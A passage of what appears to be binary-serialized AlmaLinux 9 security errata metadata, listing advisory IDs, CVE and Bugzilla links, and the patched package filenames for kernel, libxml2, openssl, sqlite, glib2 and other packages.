14.0-570.25.1.el9_6.x86_64.rpm!Xkernel-modules-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-modules-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-abi-stablelists-5.14.0-570.25.1.el9_6.noarch.rpm Xkernel-debug-uki-virt-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-modules-extra-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-tools-libs-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-modules-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-tools-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-modules-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-modules-extra-5.14.0-570.25.1.el9_6.x86_64.rpm"Xkernel-uki-virt-5.14.0-570.25.1.el9_6.x86_64.rpm%Xkernel-uki-virt-addons-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-5.14.0-570.25.1.el9_6.x86_64.rpm!Xkernel-modules-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-modules-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-abi-stablelists-5.14.0-570.25.1.el9_6.noarch.rpm Xkernel-debug-uki-virt-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-modules-extra-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-tools-libs-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-modules-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-tools-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-debug-modules-core-5.14.0-570.25.1.el9_6.x86_64.rpmXkernel-core-5.14.0-570.25.1.el9_6.x86_64.rpm�ÿ��
�5�ssecurityModerate: python-setuptools security update&��2�Jhttps://access.redhat.com/errata/RHSA-2025:10407RHSA-2025:10407RHSA-2025:10407https://access.redhat.com/security/cve/CVE-2025-47273CVE-2025-47273CVE-2025-47273https://bugzilla.redhat.com/23669822366982https://errata.almalinux.org/9/ALSA-2025-10407.htmlALSA-2025:10407ALSA-2025:10407�K�Rpython3-setuptools-wheel-53.0.0-13.el9_6.1.noarch.rpm�J�Rpython3-setuptools-53.0.0-13.el9_6.1.noarch.rpm�K�Rpython3-setuptools-wheel-53.0.0-13.el9_6.1.noarch.rpm�J�Rpython3-setuptools-53.0.0-13.el9_6.1.noarch.rpm�ó�`�
�9�vBsecurityModerate: jq security update&��|�
https://access.redhat.com/errata/RHSA-2025:10585RHSA-2025:10585RHSA-2025:10585https://access.redhat.com/security/cve/CVE-2024-23337CVE-2024-23337CVE-2024-23337https://access.redhat.com/security/cve/CVE-2025-48060CVE-2025-48060CVE-2025-48060https://bugzilla.redhat.com/23678072367807https://bugzilla.redhat.com/23678422367842https://errata.almalinux.org/9/ALSA-2025-10585.htmlALSA-2025:10585ALSA-2025:10585�*�jjq-1.6-17.el9_6.2.x86_64.rpm�*�jjq-1.6-17.el9_6.2.i686.rpm�*�jjq-1.6-17.el9_6.2.x86_64.rpm�*�jjq-1.6-17.el9_6.2.i686.rpm�þ�C�

��zBBBsecurityImportant: libxml2 security update&'���Lhttps://access.redhat.com/errata/RHSA-2025:10699RHSA-2025:10699RHSA-2025:10699https://access.redhat.com/security/cve/CVE-2025-49794CVE-2025-49794CVE-2025-49794https://access.redhat.com/security/cve/CVE-2025-49796CVE-2025-49796CVE-2025-49796https://access.redhat.com/security/cve/CVE-2025-6021CVE-2025-6021CVE-2025-6021https://bugzilla.redhat.com/23723732372373https://bugzilla.redhat.com/23723852372385https://bugzilla.redhat.com/23724062372406https://errata.almalinux.org/9/ALSA-2025-10699.htmlALSA-2025:10699ALSA-2025:10699��libxml2-2.9.13-10.el9_6.x86_64.rpm�O�python3-libxml2-2.9.13-10.el9_6.x86_64.rpm��libxml2-2.9.13-10.el9_6.i686.rpm��libxml2-2.9.13-10.el9_6.x86_64.rpm�O�python3-libxml2-2.9.13-10.el9_6.x86_64.rpm��libxml2-2.9.13-10.el9_6.i686.rpm�þ�#�
��BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��R�https://access.redhat.com/errata/RHSA-2025:10837RHSA-2025:10837RHSA-2025:10837https://access.redhat.com/security/cve/CVE-2025-21991CVE-2025-21991CVE-2025-21991https://bugzilla.redhat.com/23569172356917https://errata.almalinux.org/9/ALSA-2025-10837.htmlALSA-2025:10837ALSA-2025:10837Ykernel-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-modules-5.14.0-570.26.1.el9_6.x86_64.rpm Ykernel-debug-uki-virt-5.14.0-570.26.1.el9_6.x86_64.rpm"Ykernel-uki-virt-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-tools-libs-5.14.0-570.26.1.el9_6.x86_64.rpm%Ykernel-uki-virt-addons-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-modules-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-modules-extra-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-core-5.14.0-570.26.1.el9_6.x86_64.rpm!Ykernel-modules-core-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-modules-extra-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-tools-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-core-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-abi-stablelists-5.14.0-570.26.1.el9_6.noarch.rpmYkernel-debug-modules-core-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-modules-5.14.0-570.26.1.el9_6.x86_64.rpm Ykernel-debug-uki-virt-5.14.0-570.26.1.el9_6.x86_64.rpm"Ykernel-uki-virt-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-tools-libs-5.14.0-570.26.1.el9_6.x86_64.rpm%Ykernel-uki-virt-addons-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-modules-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-modules-extra-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-core-5.14.0-570.26.1.el9_6.x86_64.rpm!Ykernel-modules-core-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-debug-modules-extra-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-tools-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-core-5.14.0-570.26.1.el9_6.x86_64.rpmYkernel-abi-stablelists-5.14.0-570.26.1.el9_6.noarch.rpmYkernel-debug-modules-core-5.14.0-570.26.1.el9_6.x86_64.rpm����p�
��^BsecurityModerate: glib2 security update&��f�https://access.redhat.com/errata/RHSA-2025:11140RHSA-2025:11140RHSA-2025:11140https://access.redhat.com/security/cve/CVE-2024-52533CVE-2024-52533CVE-2024-52533https://access.redhat.com/security/cve/CVE-2025-4373CVE-2025-4373CVE-2025-4373https://bugzilla.redhat.com/23253402325340https://bugzilla.redhat.com/23642652364265https://errata.almalinux.org/9/ALSA-2025-11140.htmlALSA-2025:11140ALSA-2025:11140�X�~glib2-2.68.4-16.el9_6.2.i686.rpm�X�~glib2-2.68.4-16.el9_6.2.x86_64.rpm�X�~glib2-2.68.4-16.el9_6.2.i686.rpm�X�~glib2-2.68.4-16.el9_6.2.x86_64.rpm��޽.�
��aBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��j�Vhttps://access.redhat.com/errata/RHSA-2025:11411RHSA-2025:11411RHSA-2025:11411https://access.redhat.com/security/cve/CVE-2024-58002CVE-2024-58002CVE-2024-58002https://access.redhat.com/security/cve/CVE-2025-38089CVE-2025-38089CVE-2025-38089https://bugzilla.redhat.com/23485132348513https://bugzilla.redhat.com/23755292375529https://errata.almalinux.org/9/ALSA-2025-11411.htmlALSA-2025:11411ALSA-2025:11411%Zkernel-uki-virt-addons-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-modules-extra-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-modules-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-abi-stablelists-5.14.0-570.28.1.el9_6.noarch.rpm Zkernel-debug-uki-virt-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-extra-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-tools-libs-5.14.0-570.28.1.el9_6.x86_64.rpm"Zkernel-uki-virt-5.14.0-570.28.1.el9_6.x86_64.rpm!Zkernel-modules-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-tools-5.14.0-570.28.1.el9_6.x86_64.rpm%Zkernel-uki-virt-addons-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-modules-extra-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-modules-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-abi-stablelists-5.14.0-570.28.1.el9_6.noarch.rpm Zkernel-debug-uki-virt-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-modules-extra-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-tools-libs-5.14.0-570.28.1.el9_6.x86_64.rpm"Zkernel-uki-virt-5.14.0-570.28.1.el9_6.x86_64.rpm!Zkernel-modules-core-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-debug-5.14.0-570.28.1.el9_6.x86_64.rpmZkernel-tools-5.14.0-570.28.1.el9_6.x86_64.rpm��V�
��@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��@�https://access.redhat.com/errata/RHSA-2025:11861RHSA-2025:11861RHSA-2025:11861https://access.redhat.com/security/cve/CVE-2024-57980CVE-2024-57980CVE-2024-57980https://access.redhat.com/security/cve/CVE-2025-21905CVE-2025-21905CVE-2025-21905https://access.redhat.com/security/cve/CVE-2025-22085CVE-2025-22085CVE-2025-22085https://access.redhat.com/security/cve/CVE-2025-22091CVE-2025-22091CVE-2025-22091https://access.redhat.com/security/cve/CVE-2025-22113CVE-2025-22113CVE-2025-22113https://access.redhat.com/security/cve/CVE-2025-22121CVE-2025-22121CVE-2025-22121https://access.redhat.com/security/cve/CVE-2025-37797CVE-2025-37797CVE-2025-37797https://access.redhat.com/security/cve/CVE-2025-37958CVE-2025-37958CVE-2025-37958https://access.redhat.com/security/cve/CVE-2025-38086CVE-2025-38086CVE-2025-38086https://access.redhat.com/security/cve/CVE-2025-38110CVE-2025-38110CVE-2025-38110https://bugzilla.redhat.com/23485992348599https://bugzilla.redhat.com/23566132356613https://bugzilla.redhat.com/23601862360186https://bugzilla.redhat.com/23601992360199https://bugzilla.redhat.com/23602122360212https://bugzilla.redhat.com/23602192360219https://bugzilla.redhat.com/23636722363672https://bugzilla.redhat.com/23675722367572https://bugzilla.redhat.com/23753052375305https://bugzilla.redhat.com/23760352376035https://errata.almalinux.org/9/ALSA-2025-11861.htmlALSA-2025:11861ALSA-2025:11861[kernel-debug-core-5.14.0-570.30.1.el9_6.x86_64.rpm%[kernel-uki-virt-addons-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-abi-stablelists-5.14.0-570.30.1.el9_6.noarch.rpm[kernel-debug-modules-extra-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-modules-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-modules-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-tools-libs-5.14.0-570.30.1.el9_6.x86_64.rpm"[kernel-uki-virt-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-core-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-5.14.0-570.30.1.el9_6.x86_64.rpm![kernel-modules-core-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-modules-core-5.14.0-570.30.1.el9_6.x86_64.rpm [kernel-debug-uki-virt-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-modules-extra-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-tools-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-core-5.14.0-570.30.1.el9_6.x86_64.rpm%[kernel-uki-virt-addons-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-abi-stablelists-5.14.0-570.30.1.el9_6.noarch.rpm[kernel-debug-modules-extra-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-modules-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-modules-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-tools-libs-5.14.0-570.30.1.el9_6.x86_64.rpm"[kernel-uki-virt-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-core-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-5.14.0-570.30.1.el9_6.x86_64.rpm![kernel-modules-core-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-debug-modules-core-5.14.0-570.30.1.el9_6.x86_64.rpm [kernel-debug-uki-virt-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-modules-extra-5.14.0-570.30.1.el9_6.x86_64.rpm[kernel-tools-5.14.0-570.30.1.el9_6.x86_64.rpm�į�+�
��_BsecurityImportant: sqlite security update&'��N�	https://access.redhat.com/errata/RHSA-2025:11992RHSA-2025:11992RHSA-2025:11992https://access.redhat.com/security/cve/CVE-2025-6965CVE-2025-6965CVE-2025-6965https://bugzilla.redhat.com/23801492380149https://errata.almalinux.org/9/ALSA-2025-11992.htmlALSA-2025:11992ALSA-2025:11992�\�sqlite-libs-3.34.1-8.el9_6.x86_64.rpm�\�sqlite-libs-3.34.1-8.el9_6.i686.rpm�\�sqlite-libs-3.34.1-8.el9_6.x86_64.rpm�\�sqlite-libs-3.34.1-8.el9_6.i686.rpm���
��bBsecurityModerate: icu security update&��W�https://access.redhat.com/errata/RHSA-2025:12083RHSA-2025:12083RHSA-2025:12083https://access.redhat.com/security/cve/CVE-2025-5222CVE-2025-5222CVE-2025-5222https://bugzilla.redhat.com/23686002368600https://errata.almalinux.org/9/ALSA-2025-12083.htmlALSA-2025:12083ALSA-2025:12083�6�#libicu-67.1-10.el9_6.i686.rpm�6�#libicu-67.1-10.el9_6.x86_64.rpm�6�#libicu-67.1-10.el9_6.i686.rpm�6�#libicu-67.1-10.el9_6.x86_64.rpm�ħ�G�
��eBBBsecurityImportant: libxml2 security update&'��i�!https://access.redhat.com/errata/RHSA-2025:12447RHSA-2025:12447RHSA-2025:12447https://access.redhat.com/security/cve/CVE-2025-7425CVE-2025-7425CVE-2025-7425https://bugzilla.redhat.com/23792742379274https://errata.almalinux.org/9/ALSA-2025-12447.htmlALSA-2025:12447ALSA-2025:12447��libxml2-2.9.13-11.el9_6.i686.rpm��libxml2-2.9.13-11.el9_6.x86_64.rpm�O�python3-libxml2-2.9.13-11.el9_6.x86_64.rpm��libxml2-2.9.13-11.el9_6.i686.rpm��libxml2-2.9.13-11.el9_6.x86_64.rpm�O�python3-libxml2-2.9.13-11.el9_6.x86_64.rpm�ij�y�
��*securityModerate: python-requests security update&��
�Rhttps://access.redhat.com/errata/RHSA-2025:12519RHSA-2025:12519RHSA-2025:12519https://access.redhat.com/security/cve/CVE-2024-47081CVE-2024-47081CVE-2024-47081https://bugzilla.redhat.com/23712722371272https://errata.almalinux.org/9/ALSA-2025-12519.htmlALSA-2025:12519ALSA-2025:12519�I�python3-requests-2.25.1-10.el9_6.noarch.rpm�I�python3-requests-2.25.1-10.el9_6.noarch.rpm����f�
��kBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��\�https://access.redhat.com/errata/RHSA-2025:1262RHSA-2025:1262RHSA-2025:1262https://access.redhat.com/security/cve/CVE-2024-53104CVE-2024-53104CVE-2024-53104https://bugzilla.redhat.com/23298172329817https://errata.almalinux.org/9/ALSA-2025-1262.htmlALSA-2025:1262ALSA-2025:1262"9kernel-uki-virt-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-5.14.0-503.23.2.el9_5.x86_64.rpm1�Pbpftool-7.4.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-extra-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-tools-libs-5.14.0-503.23.2.el9_5.x86_64.rpm29python3-perf-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-tools-5.14.0-503.23.2.el9_5.x86_64.rpm%9kernel-uki-virt-addons-5.14.0-503.23.2.el9_5.x86_64.rpm 9kernel-debug-uki-virt-5.14.0-503.23.2.el9_5.x86_64.rpm!9kernel-modules-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-modules-extra-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-modules-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-abi-stablelists-5.14.0-503.23.2.el9_5.noarch.rpm"9kernel-uki-virt-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-5.14.0-503.23.2.el9_5.x86_64.rpm1�Pbpftool-7.4.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-extra-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-tools-libs-5.14.0-503.23.2.el9_5.x86_64.rpm29python3-perf-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-modules-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-tools-5.14.0-503.23.2.el9_5.x86_64.rpm%9kernel-uki-virt-addons-5.14.0-503.23.2.el9_5.x86_64.rpm 9kernel-debug-uki-virt-5.14.0-503.23.2.el9_5.x86_64.rpm!9kernel-modules-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-debug-core-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-modules-extra-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-modules-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-5.14.0-503.23.2.el9_5.x86_64.rpm9kernel-abi-stablelists-5.14.0-503.23.2.el9_5.noarch.rpm�����
��NBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update&'��y�ohttps://access.redhat.com/errata/RHSA-2025:12746RHSA-2025:12746RHSA-2025:12746https://access.redhat.com/security/cve/CVE-2022-49788CVE-2022-49788CVE-2022-49788https://access.redhat.com/security/cve/CVE-2025-21727CVE-2025-21727CVE-2025-21727https://access.redhat.com/security/cve/CVE-2025-21928CVE-2025-21928CVE-2025-21928https://access.redhat.com/security/cve/CVE-2025-21929CVE-2025-21929CVE-2025-21929https://access.redhat.com/security/cve/CVE-2025-21962CVE-2025-21962CVE-2025-21962https://access.redhat.com/security/cve/CVE-2025-22020CVE-2025-22020CVE-2025-22020https://access.redhat.com/security/cve/CVE-2025-37890CVE-2025-37890CVE-2025-37890https://access.redhat.com/security/cve/CVE-2025-38052CVE-2025-38052CVE-2025-38052https://access.redhat.com/security/cve/CVE-2025-38087CVE-2025-38087CVE-2025-38087https://bugzilla.redhat.com/23485162348516https://bugzilla.redhat.com/23565922356592https://bugzilla.redhat.com/23565942356594https://bugzilla.redhat.com/23566242356624https://bugzilla.redhat.com/23600992360099https://bugzilla.redhat.com/23633782363378https://bugzilla.redhat.com/23668482366848https://bugzilla.redhat.com/23733802373380https://bugzilla.redhat.com/23755312375531https://errata.almalinux.org/9/ALSA-2025-12746.htmlALSA-2025:12746ALSA-2025:12746\kernel-debug-modules-5.14.0-570.32.1.el9_6.x86_64.rpm%\kernel-uki-virt-addons-5.14.0-570.32.1.el9_6.x86_64.rpm"\kernel-uki-virt-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-modules-extra-5.14.0-570.32.1.el9_6.x86_64.rpm \kernel-debug-uki-virt-5.14.0-570.32.1.el9_6.x86_64.rpm!\kernel-modules-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-tools-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-modules-extra-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-modules-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-modules-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-abi-stablelists-5.14.0-570.32.1.el9_6.noarch.rpm\kernel-tools-libs-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-modules-5.14.0-570.32.1.el9_6.x86_64.rpm%\kernel-uki-virt-addons-5.14.0-570.32.1.el9_6.x86_64.rpm"\kernel-uki-virt-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-modules-extra-5.14.0-570.32.1.el9_6.x86_64.rpm \kernel-debug-uki-virt-5.14.0-570.32.1.el9_6.x86_64.rpm!\kernel-modules-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-tools-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-modules-extra-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-modules-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-debug-modules-core-5.14.0-570.32.1.el9_6.x86_64.rpm\kernel-abi-stablelists-5.14.0-570.32.1.el9_6.noarch.rpm\kernel-tools-libs-5.14.0-570.32.1.el9_6.x86_64.rpm��Қ�
��mBBBsecurityImportant: openssl security update&'��h�qhttps://access.redhat.com/errata/RHSA-2025:1330RHSA-2025:1330RHSA-2025:1330https://access.redhat.com/security/cve/CVE-2024-12797CVE-2024-12797CVE-2024-12797https://bugzilla.redhat.com/23427572342757https://errata.almalinux.org/9/ALSA-2025-1330.htmlALSA-2025:1330ALSA-2025:1330��{openssl-libs-3.2.2-6.el9_5.1.i686.rpm�:�{openssl-3.2.2-6.el9_5.1.x86_64.rpm��{openssl-libs-3.2.2-6.el9_5.1.x86_64.rpm��{openssl-libs-3.2.2-6.el9_5.1.i686.rpm�:�{openssl-3.2.2-6.el9_5.1.x86_64.rpm��{openssl-libs-3.2.2-6.el9_5.1.x86_64.rpm����\�
��rBBBsecurityModerate: libxml2 security update&��Y�https://access.redhat.com/errata/RHSA-2025:13428RHSA-2025:13428RHSA-2025:13428https://access.redhat.com/security/cve/CVE-2025-32414CVE-2025-32414CVE-2025-32414https://access.redhat.com/security/cve/CVE-2025-32415CVE-2025-32415CVE-2025-32415https://bugzilla.redhat.com/23581212358121https://bugzilla.redhat.com/23607682360768https://errata.almalinux.org/9/ALSA-2025-13428.htmlALSA-2025:13428ALSA-2025:13428�O�python3-libxml2-2.9.13-12.el9_6.x86_64.rpm��libxml2-2.9.13-12.el9_6.x86_64.rpm��libxml2-2.9.13-12.el9_6.i686.rpm�O�python3-libxml2-2.9.13-12.el9_6.x86_64.rpm��libxml2-2.9.13-12.el9_6.x86_64.rpm��libxml2-2.9.13-12.el9_6.i686.rpm��Լ>�
��wBBBBBBBBBBBBBBBBsecurityModerate: gcc security update&��n�Khttps://access.redhat.com/errata/RHSA-2025:1346RHSA-2025:1346RHSA-2025:1346https://access.redhat.com/security/cve/CVE-2020-11023CVE-2020-11023CVE-2020-11023https://bugzilla.redhat.com/18500041850004https://errata.almalinux.org/9/ALSA-2025-1346.htmlALSA-2025:1346ALSA-2025:1346�5�libgomp-11.5.0-5.el9_5.alma.1.i686.rpm�>�libstdc++-11.5.0-5.el9_5.alma.1.i686.rpm�5�libgomp-11.5.0-5.el9_5.alma.1.x86_64.rpm�4�libgfortran-11.5.0-5.el9_5.alma.1.x86_64.rpm�2�libgcc-11.5.0-5.el9_5.alma.1.i686.rpm�4�libgfortran-11.5.0-5.el9_5.alma.1.i686.rpm�+�libatomic-11.5.0-5.el9_5.alma.1.i686.rpm�2�libgcc-11.5.0-5.el9_5.alma.1.x86_64.rpm�>�libstdc++-11.5.0-5.el9_5.alma.1.x86_64.rpm�+�libatomic-11.5.0-5.el9_5.alma.1.x86_64.rpm�;�libquadmath-11.5.0-5.el9_5.alma.1.x86_64.rpm�;�libquadmath-11.5.0-5.el9_5.alma.1.i686.rpm�5�libgomp-11.5.0-5.el9_5.alma.1.i686.rpm�>�libstdc++-11.5.0-5.el9_5.alma.1.i686.rpm�5�libgomp-11.5.0-5.el9_5.alma.1.x86_64.rpm�4�libgfortran-11.5.0-5.el9_5.alma.1.x86_64.rpm�2�libgcc-11.5.0-5.el9_5.alma.1.i686.rpm�4�libgfortran-11.5.0-5.el9_5.alma.1.i686.rpm�+�libatomic-11.5.0-5.el9_5.alma.1.i686.rpm�2�libgcc-11.5.0-5.el9_5.alma.1.x86_64.rpm�>�libstdc++-11.5.0-5.el9_5.alma.1.x86_64.rpm�+�libatomic-11.5.0-5.el9_5.alma.1.x86_64.rpm�;�libquadmath-11.5.0-5.el9_5.alma.1.x86_64.rpm�;�libquadmath-11.5.0-5.el9_5.alma.1.i686.rpm�����
��IBBBsecurityImportant: libxml2 security update&'��9�~https://access.redhat.com/errata/RHSA-2025:1350RHSA-2025:1350RHSA-2025:1350https://access.redhat.com/security/cve/CVE-2022-49043CVE-2022-49043CVE-2022-49043https://bugzilla.redhat.com/23421182342118https://errata.almalinux.org/9/ALSA-2025-1350.htmlALSA-2025:1350ALSA-2025:1350�O�	python3-libxml2-2.9.13-6.el9_5.1.x86_64.rpm��	libxml2-2.9.13-6.el9_5.1.i686.rpm��	libxml2-2.9.13-6.el9_5.1.x86_64.rpm�O�	python3-libxml2-2.9.13-6.el9_5.1.x86_64.rpm��	libxml2-2.9.13-6.el9_5.1.i686.rpm��	libxml2-2.9.13-6.el9_5.1.x86_64.rpm����
�
��NBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update&��7�Hhttps://access.redhat.com/errata/RHSA-2025:13602RHSA-2025:13602RHSA-2025:13602https://access.redhat.com/security/cve/CVE-2025-38079CVE-2025-38079CVE-2025-38079https://access.redhat.com/security/cve/CVE-2025-38292CVE-2025-38292CVE-2025-38292https://bugzilla.redhat.com/23733832373383https://bugzilla.redhat.com/23792192379219https://errata.almalinux.org/9/ALSA-2025-13602.htmlALSA-2025:13602ALSA-2025:13602]kernel-debug-modules-extra-5.14.0-570.33.2.el9_6.x86_64.rpm!]kernel-modules-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-abi-stablelists-5.14.0-570.33.2.el9_6.noarch.rpm]kernel-tools-libs-5.14.0-570.33.2.el9_6.x86_64.rpm ]kernel-debug-uki-virt-5.14.0-570.33.2.el9_6.x86_64.rpm%]kernel-uki-virt-addons-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-tools-5.14.0-570.33.2.el9_6.x86_64.rpm"]kernel-uki-virt-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-modules-extra-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-modules-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-modules-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-modules-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-modules-extra-5.14.0-570.33.2.el9_6.x86_64.rpm!]kernel-modules-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-debug-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-core-5.14.0-570.33.2.el9_6.x86_64.rpm]kernel-abi-stablelists-5.14.0-570.33.2.el9_6.noarch.rpm]kernel-tools-libs-5.14.0-570.33.2.el9_6.x86_64.rpm 